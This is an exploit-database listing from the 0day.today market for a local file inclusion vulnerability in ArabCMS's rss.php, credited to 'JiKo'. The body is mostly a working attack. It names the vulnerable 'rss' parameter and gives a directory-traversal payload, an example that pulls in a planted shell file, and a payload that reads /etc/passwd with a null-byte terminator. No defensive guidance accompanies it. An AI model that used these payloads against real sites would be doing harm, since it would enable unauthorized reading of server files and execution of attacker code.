[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

ArabCMS (rss.php rss) Local File Inclusion Vulnerability

Author
JiKo
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3803
Category
web applications
Date add
28-09-2008
Platform
unsorted
========================================================
ArabCMS (rss.php rss) Local File Inclusion Vulnerability
========================================================


####################################################################################
######              Local File Inclusion Vulnerabilities                       #####
###### http://www.the-ghost.com/extras/am2/am%202.0%20beta%201.zip             #####
###### author : JIKO                                                           #####
###### foor read a php file >     ?rss=[name of file iwthout php]              #####
###### for execute exploit does not write extention of file                    #####
######                                                                         #####
######                                                                         #####
###### exploit : /Script/rss.php?rss=../[name of file wthout php]              #####
######                                                                         #####
###### example : /Script/rss.php?rss==/home/user/shell                         #####
######                                                                         #####
###### other files:        rss=../../../../etc/passwd%00                       #####
####################################################################################




#  0day.today [2024-11-15]  #